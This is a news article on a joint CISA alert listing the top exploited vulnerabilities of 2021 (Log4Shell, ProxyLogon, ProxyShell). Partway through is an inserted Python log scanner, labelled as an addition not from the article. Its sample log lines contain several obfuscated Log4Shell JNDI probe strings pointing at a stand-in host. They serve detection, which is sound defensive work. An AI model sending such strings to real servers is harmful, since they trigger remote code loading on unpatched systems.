Log4j, ProxyShell Among Top Exploited Vulnerabilities Last Year

CISA’s list of the top 15 routinely exploited vulnerabilities included 3 that were also routinely exploited in 2020, showing a need to prioritize patching.

By Jill McKeon

ProxyShell, Log4Shell, and ProxyLogon were among the top 15 routinely exploited vulnerabilities in 2021, the Cybersecurity and Infrastructure Security Agency (CISA) revealed. CISA released a joint alert coauthored by authorities from Australia, New Zealand, Canada, and the UK. The alert applied to all critical infrastructure sectors, including healthcare.

“U.S., Australian, Canadian, New Zealand, and UK cybersecurity authorities assess, in 2021, malicious cyber actors aggressively targeted newly disclosed critical software vulnerabilities against broad target sets, including public and private sector organizations worldwide,” the alert stated.

“To a lesser extent, malicious cyber actors continued to exploit publicly known, dated software vulnerabilities across a broad spectrum of targets.”

Three of the top 15 vulnerabilities—CVE-2020-1472, CVE-2018-13379, and CVE-2019-11510—were also routinely exploited in 2020.

“Their continued exploitation indicates that many organizations fail to patch software in a timely manner and remain vulnerable to malicious cyber actors,” the alert explained.

The Log4Shell vulnerability (CVE-2021-44228), which affects Apache’s Log4j library, made headlines in 2021 and caused the cybersecurity workforce to work overtime remediating the vulnerability. Successful exploitation allows a threat actor to cause a system to execute arbitrary code by submitting a specially crafted request.

Researchers disclosed the vulnerability in late 2021, but threat actors managed to exploit it before organizations could patch it.
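As an added defender-side illustration (not code from the article or from CISA), the Python below scans constructed web-server log lines for the Log4j lookup strings that a Log4Shell request carries, first unfolding the nested lookup syntax commonly used to disguise them. The log format and the `example.invalid` host are assumptions made for the example.

```python
import re
from typing import List, Tuple

# Constructed sample access-log lines; not real traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - "GET /index.html HTTP/1.1" 200 512 "Mozilla/5.0"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 512 "${jndi:ldap://example.invalid/a}"',
    '10.0.0.7 - - "GET / HTTP/1.1" 200 512 "${${lower:j}ndi:ldap://example.invalid/a}"',
    '10.0.0.8 - - "GET / HTTP/1.1" 200 512 "${${::-j}${::-n}di:ldap://example.invalid/a}"',
    '10.0.0.3 - - "GET /price?q=${date:yyyy} HTTP/1.1" 200 40 "curl/7.79"',
]

# One innermost ${...} lookup: a body with no further ${ or } inside it.
_INNER = re.compile(r"\$\{([^${}]*)\}")
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve_one(expr: str) -> str:
    """Evaluate the Log4j lookups that only transform text (used to hide 'jndi')."""
    if ":-" in expr:                      # ${name:-default} -> default when name is undefined
        return expr.split(":-", 1)[1]
    name, _, value = expr.partition(":")
    name = name.lower()
    if name == "lower":
        return value.lower()
    if name == "upper":
        return value.upper()
    return "${" + expr + "}"              # keep jndi/env/... lookups intact for matching


def normalize_lookups(text: str, max_rounds: int = 10) -> str:
    """Repeatedly collapse innermost lookups until the string stops changing."""
    for _ in range(max_rounds):
        collapsed = _INNER.sub(lambda m: _resolve_one(m.group(1)), text)
        if collapsed == text:
            break
        text = collapsed
    return text


def is_log4shell_probe(line: str) -> bool:
    """True when the line contains a JNDI lookup after de-obfuscation."""
    return bool(_JNDI.search(normalize_lookups(line)))


def scan_log(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (line number, line) for every entry that should be investigated."""
    return [(n, line) for n, line in enumerate(lines, 1) if is_log4shell_probe(line)]


if __name__ == "__main__":
    for n, line in scan_log(SAMPLE_LOG):
        print(f"line {n}: {line}")
```

Lines that carry only a benign-looking lookup such as `${date:yyyy}` are not flagged here; in practice any lookup syntax arriving in client-controlled fields is worth a closer look while unpatched Log4j versions remain on the network.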

The alert also highlighted the prominence of a series of vulnerabilities known as ProxyLogon (CVE-2021-26855, CVE-2021-26858, CVE-2021-26857, CVE-2021-27065), which affect Microsoft Exchange email servers.

“Successful exploitation of these vulnerabilities in combination (i.e., “vulnerability chaining”) allows an unauthenticated cyber actor to execute arbitrary code on vulnerable Exchange Servers, which, in turn, enables the actor to gain persistent access to files and mailboxes on the servers, as well as to credentials stored on the servers,” the alert stated.

“Successful exploitation may additionally enable the cyber actor to compromise trust and identity in a vulnerable network.”

In addition, CISA noted the ProxyShell vulnerabilities (CVE-2021-34523, CVE-2021-34473, CVE-2021-31207), which also impact Microsoft Exchange email servers. Successful exploitation of these vulnerabilities allows threat actors to execute arbitrary code remotely.

To mitigate all vulnerabilities, CISA emphasized the urgency of patching as soon as a vulnerability is disclosed. The National Institute of Standards and Technology’s (NIST) National Cybersecurity Center of Excellence (NCCoE) recently released final guidance on enterprise patch management to help organizations prevent vulnerabilities and exploitation within their IT systems.

Unpatched devices and systems can serve as an easy network entry point for threat actors. Medical devices in particular can be difficult to patch due to their portability and the fact that organizations may not know how many devices are on their networks at any given time.

CISA’s alert encouraged organizations to implement multifactor authentication along with network segmentation and endpoint detection systems.